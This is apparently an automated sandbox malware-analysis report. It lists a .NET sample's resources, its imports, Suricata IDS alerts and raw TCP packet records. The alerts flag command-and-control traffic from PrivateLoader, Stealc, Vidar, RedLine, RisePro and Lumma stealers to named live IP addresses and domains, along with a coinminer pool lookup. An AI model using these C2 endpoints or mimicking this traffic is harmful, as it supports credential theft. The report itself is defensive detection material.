GIF	0x8b8784	0x339f	GIF image data, version 89a, 350 x 624	English	United States	0.9129020052970109
PNG	0x8bbb24	0x39ed	PNG image data, 360 x 150, 8-bit/color RGBA, non-interlaced			0.9975723244992919
PNG	0x8bf514	0x2fc9	PNG image data, 240 x 227, 8-bit/color RGBA, non-interlaced			0.9968119022316685
REGISTRY	0x8c24e0	0x26c	ASCII text, with CRLF line terminators			0.5451612903225806
REGISTRY	0x8c274c	0xc2	ASCII text, with CRLF line terminators			0.7268041237113402
TYPELIB	0x8c2810	0x1fdc	data	English	United States	0.35544384502206966
RT_BITMAP	0x8c47ec	0x14220	Device independent bitmap graphic, 220 x 370 x 8, image size 81400			0.34390764454792394
RT_BITMAP	0x8d8a0c	0x666	Device independent bitmap graphic, 96 x 16 x 8, image size 1538, resolution 2868 x 2868 px/m, 15 important colors	English	United States	0.18192918192918192
RT_BITMAP	0x8d9074	0x1b5c	Device independent bitmap graphic, 180 x 75 x 4, image size 6900			0.18046830382638493
RT_BITMAP	0x8dabd0	0x38e4	Device independent bitmap graphic, 180 x 75 x 8, image size 13500			0.26689096402087337
RT_BITMAP	0x8de4b4	0x1238	Device independent bitmap graphic, 60 x 60 x 8, image size 3600			0.23499142367066894
RT_BITMAP	0x8df6ec	0x6588	Device independent bitmap graphic, 161 x 152 x 8, image size 24928, resolution 3796 x 3796 px/m, 256 important colors			0.3035934133579563
RT_BITMAP	0x8e5c74	0x11f88	Device independent bitmap graphic, 161 x 152 x 24, image size 73568, resolution 3780 x 3780 px/m			0.12790729268557766
RT_ICON	0x8f7bfc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m			0.3612033195020747
RT_ICON	0x8fa1a4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m			0.28856618951851415
RT_ICON	0x90a9cc	0xdcba	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9992921105723286
RT_MENU	0x918688	0x1c	data	English	United States	1.0357142857142858
RT_DIALOG	0x9186a4	0xd4	data	English	United States	0.6886792452830188
RT_DIALOG	0x918778	0x50	data	English	United States	0.8875
RT_STRING	0x9187c8	0x68	data	English	United States	0.6538461538461539
RT_STRING	0x918830	0xd4	data	English	United States	0.5283018867924528
RT_STRING	0x918904	0xa4	data	English	United States	0.6524390243902439
RT_STRING	0x9189a8	0x2ac	data	English	United States	0.45614035087719296
RT_STRING	0x918c54	0x34c	data	English	United States	0.4218009478672986
RT_STRING	0x918fa0	0x294	data	English	United States	0.4106060606060606
RT_RCDATA	0x919234	0x10	data			1.5
RT_RCDATA	0x919244	0x2c4	data			0.6384180790960452
RT_RCDATA	0x919508	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0x919534	0x30	data			0.875
RT_VERSION	0x919564	0x380	data			0.44642857142857145
RT_MANIFEST	0x9198e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-04T17:36:58.876472+0200	2054709	ET MALWARE PrivateLoader CnC Activity (GET)	1	192.168.2.6	49713	62.133.61.172	80	TCP
2024-09-04T17:37:01.940422+0200	2054710	ET MALWARE PrivateLoader CnC Response	1	62.133.61.172	80	192.168.2.6	49713	TCP
2024-09-04T17:37:03.046189+0200	2054711	ET MALWARE PrivateLoader CnC Activity (POST)	1	192.168.2.6	49713	62.133.61.172	80	TCP
2024-09-04T17:37:04.597604+0200	2054711	ET MALWARE PrivateLoader CnC Activity (POST)	1	192.168.2.6	49713	62.133.61.172	80	TCP
2024-09-04T17:37:06.564859+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:06.715822+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:06.805797+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49725	76.76.21.98	443	TCP
2024-09-04T17:37:07.282069+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:07.457824+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:07.725711+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:08.309512+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:08.770315+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49726	154.216.17.178	80	TCP
2024-09-04T17:37:10.189365+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:15.399757+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49718	31.41.244.9	80	TCP
2024-09-04T17:37:15.924539+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49730	176.111.174.109	80	TCP
2024-09-04T17:37:16.356390+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49719	147.45.44.104	80	TCP
2024-09-04T17:37:18.670131+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49717	147.45.44.104	80	TCP
2024-09-04T17:37:26.384693+0200	2054711	ET MALWARE PrivateLoader CnC Activity (POST)	1	192.168.2.6	49713	62.133.61.172	80	TCP
2024-09-04T17:37:32.403011+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:32.844945+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:32.890178+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	46.8.231.109	80	192.168.2.6	53026	TCP
2024-09-04T17:37:33.072116+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:33.152431+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	46.8.231.109	80	192.168.2.6	53026	TCP
2024-09-04T17:37:33.863217+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:34.090540+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:34.586862+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:34.586862+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:34.980732+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	147.45.47.36	30035	192.168.2.6	53029	TCP
2024-09-04T17:37:34.986857+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	147.45.47.36	30035	192.168.2.6	53029	TCP
2024-09-04T17:37:36.209129+0200	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	1	77.105.164.24	50505	192.168.2.6	53031	TCP
2024-09-04T17:37:39.338689+0200	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	1	192.168.2.6	53031	77.105.164.24	50505	TCP
2024-09-04T17:37:39.338689+0200	2049060	ET MALWARE RisePro TCP Heartbeat Packet	1	192.168.2.6	53031	77.105.164.24	50505	TCP
2024-09-04T17:37:39.647571+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:40.296871+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:40.487994+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	147.45.47.36	30035	192.168.2.6	53029	TCP
2024-09-04T17:37:41.546027+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:42.767320+0200	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	192.168.2.6	56825	1.1.1.1	53	UDP
2024-09-04T17:37:42.892835+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:42.997871+0200	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	192.168.2.6	63594	1.1.1.1	53	UDP
2024-09-04T17:37:43.132519+0200	2055482	ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)	1	192.168.2.6	56028	1.1.1.1	53	UDP
2024-09-04T17:37:43.487403+0200	2055475	ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)	1	192.168.2.6	58373	1.1.1.1	53	UDP
2024-09-04T17:37:43.679616+0200	2055492	ET MALWARE Lumma Stealer Domain in TLS SNI (stamppreewntnq .shop)	1	192.168.2.6	53035	188.114.97.3	443	TCP
2024-09-04T17:37:43.963829+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:44.320400+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53036	172.67.146.35	443	TCP
2024-09-04T17:37:44.761977+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	53035	188.114.97.3	443	TCP
2024-09-04T17:37:44.761977+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53035	188.114.97.3	443	TCP
2024-09-04T17:37:44.774171+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	53036	172.67.146.35	443	TCP
2024-09-04T17:37:44.774171+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53036	172.67.146.35	443	TCP
2024-09-04T17:37:45.518932+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:45.626173+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53038	172.67.146.35	443	TCP
2024-09-04T17:37:45.702579+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53039	172.67.146.35	443	TCP
2024-09-04T17:37:45.719788+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:45.788154+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	53038	172.67.146.35	443	TCP
2024-09-04T17:37:45.788154+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53038	172.67.146.35	443	TCP
2024-09-04T17:37:45.909069+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:45.938450+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:46.148036+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	53039	172.67.146.35	443	TCP
2024-09-04T17:37:46.148036+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53039	172.67.146.35	443	TCP
2024-09-04T17:37:47.016827+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:47.198282+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53026	46.8.231.109	80	TCP
2024-09-04T17:37:47.215800+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:50.442629+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53041	172.67.146.35	443	TCP
2024-09-04T17:37:50.751615+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53042	147.45.44.104	80	TCP
2024-09-04T17:37:50.980980+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	53041	172.67.146.35	443	TCP
2024-09-04T17:37:50.980980+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53041	172.67.146.35	443	TCP
2024-09-04T17:37:52.149117+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53042	147.45.44.104	80	TCP
2024-09-04T17:37:54.228440+0200	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	192.168.2.6	54987	1.1.1.1	53	UDP
2024-09-04T17:37:54.274858+0200	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	192.168.2.6	50145	1.1.1.1	53	UDP
2024-09-04T17:37:54.785593+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53044	172.67.146.35	443	TCP
2024-09-04T17:37:55.216508+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	53044	172.67.146.35	443	TCP
2024-09-04T17:37:55.216508+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53044	172.67.146.35	443	TCP
2024-09-04T17:37:56.179949+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:56.636246+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:57.087481+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53045	172.67.146.35	443	TCP
2024-09-04T17:37:57.252773+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.6	53043	147.45.68.138	80	TCP
2024-09-04T17:37:57.502531+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	53045	172.67.146.35	443	TCP
2024-09-04T17:37:57.502531+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53045	172.67.146.35	443	TCP
2024-09-04T17:37:58.294219+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	147.45.68.138	80	192.168.2.6	53043	TCP
2024-09-04T17:37:58.811842+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:59.245139+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:37:59.250315+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:00.063296+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:00.373293+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:00.444917+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	147.45.68.138	80	192.168.2.6	53043	TCP
2024-09-04T17:38:01.410211+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:01.603320+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:01.886104+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:02.074632+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:02.263069+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:02.757075+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:04.984391+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.190281+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.378529+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.566858+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:05.822258+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.6	53029	147.45.47.36	30035	TCP
2024-09-04T17:38:11.462458+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.6	55645	1.1.1.1	53	UDP
2024-09-04T17:38:20.118624+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53051	147.45.44.104	80	TCP
2024-09-04T17:38:21.829208+0200	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	192.168.2.6	51216	1.1.1.1	53	UDP
2024-09-04T17:38:22.780131+0200	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	192.168.2.6	56102	1.1.1.1	53	UDP
2024-09-04T17:38:23.012738+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	53051	147.45.44.104	80	TCP
2024-09-04T17:38:24.259966+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53052	172.67.146.35	443	TCP
2024-09-04T17:38:24.392166+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	53052	172.67.146.35	443	TCP
2024-09-04T17:38:24.392166+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53052	172.67.146.35	443	TCP
2024-09-04T17:38:25.662311+0200	2055485	ET MALWARE Lumma Stealer Domain in TLS SNI (condedqpwqm .shop)	1	192.168.2.6	53053	172.67.146.35	443	TCP
2024-09-04T17:38:26.120677+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	53053	172.67.146.35	443	TCP
2024-09-04T17:38:26.120677+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	53053	172.67.146.35	443	TCP
2024-09-04T17:38:27.779562+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.6	53054	45.132.206.251	80	TCP
2024-09-04T17:38:33.144896+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	147.45.68.138	80	192.168.2.6	53055	TCP
2024-09-04T17:38:37.839910+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	53058	185.215.113.100	80	TCP
2024-09-04T17:38:39.878636+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	147.45.68.138	80	192.168.2.6	53055	TCP
2024-09-04T17:38:45.610671+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	147.45.68.138	80	192.168.2.6	53059	TCP
2024-09-04T17:38:46.579585+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	147.45.68.138	80	192.168.2.6	53059	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 4, 2024 17:36:57.940630913 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:36:57.945643902 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:36:57.945714951 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:36:57.945889950 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:36:57.950685978 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:36:58.876038074 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:36:58.876370907 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:36:58.876471996 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:36:58.897480965 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:58.897522926 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:58.897593021 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:58.913582087 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:58.913599014 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.527307034 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.527379990 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.530163050 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.530174017 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.530417919 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.577358007 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.579643011 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.624509096 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.788254023 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.788332939 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.788407087 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.790699959 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.790728092 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.790740013 CEST	49714	443	192.168.2.6	104.237.62.213
Sep 4, 2024 17:36:59.790745974 CEST	443	49714	104.237.62.213	192.168.2.6
Sep 4, 2024 17:36:59.801142931 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:36:59.801177025 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:36:59.801259041 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:36:59.801580906 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:36:59.801594973 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.310820103 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.311150074 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:37:00.312623978 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:37:00.312633991 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.312865973 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.314124107 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:37:00.360497952 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.455164909 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.456346989 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.456403017 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:37:00.456511021 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:37:00.456530094 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:00.456541061 CEST	49715	443	192.168.2.6	34.117.59.81
Sep 4, 2024 17:37:00.456546068 CEST	443	49715	34.117.59.81	192.168.2.6
Sep 4, 2024 17:37:01.633744955 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:01.633780003 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:01.936790943 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:01.940422058 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:01.940434933 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:01.944864988 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:03.003175020 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:03.046189070 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:03.122126102 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:03.122149944 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:03.126944065 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:03.127015114 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:04.597382069 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:04.597518921 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:04.597532034 CEST	80	49713	62.133.61.172	192.168.2.6
Sep 4, 2024 17:37:04.597604036 CEST	49713	80	192.168.2.6	62.133.61.172
Sep 4, 2024 17:37:05.110450983 CEST	49718	80	192.168.2.6	31.41.244.9
Sep 4, 2024 17:37:05.110717058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.110831022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.110903978 CEST	49720	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:05.111088037 CEST	49721	80	192.168.2.6	176.111.174.109
Sep 4, 2024 17:37:05.176297903 CEST	80	49718	31.41.244.9	192.168.2.6
Sep 4, 2024 17:37:05.176343918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.176379919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.176389933 CEST	80	49720	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:05.176398993 CEST	80	49721	176.111.174.109	192.168.2.6
Sep 4, 2024 17:37:05.176512003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.176512957 CEST	49721	80	192.168.2.6	176.111.174.109
Sep 4, 2024 17:37:05.176515102 CEST	49718	80	192.168.2.6	31.41.244.9
Sep 4, 2024 17:37:05.176516056 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.176516056 CEST	49720	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:05.177504063 CEST	49721	80	192.168.2.6	176.111.174.109
Sep 4, 2024 17:37:05.177687883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.177716017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:05.177768946 CEST	49718	80	192.168.2.6	31.41.244.9
Sep 4, 2024 17:37:05.177897930 CEST	49720	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:05.180872917 CEST	49722	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.182272911 CEST	80	49721	176.111.174.109	192.168.2.6
Sep 4, 2024 17:37:05.182553053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.182663918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:05.182673931 CEST	80	49718	31.41.244.9	192.168.2.6
Sep 4, 2024 17:37:05.182694912 CEST	80	49720	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:05.185848951 CEST	80	49722	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:05.185904026 CEST	49722	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.186450005 CEST	49722	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.191245079 CEST	80	49722	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:05.661439896 CEST	80	49722	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:05.661493063 CEST	49722	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.661597013 CEST	49722	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.662184954 CEST	49723	80	192.168.2.6	76.76.21.98
Sep 4, 2024 17:37:05.667063951 CEST	80	49722	76.76.21.98	192.168.2.6
Sep 4, 2024 17:37:05.667853117 CEST	80	49723	76.76.21.98	192.168.2.6
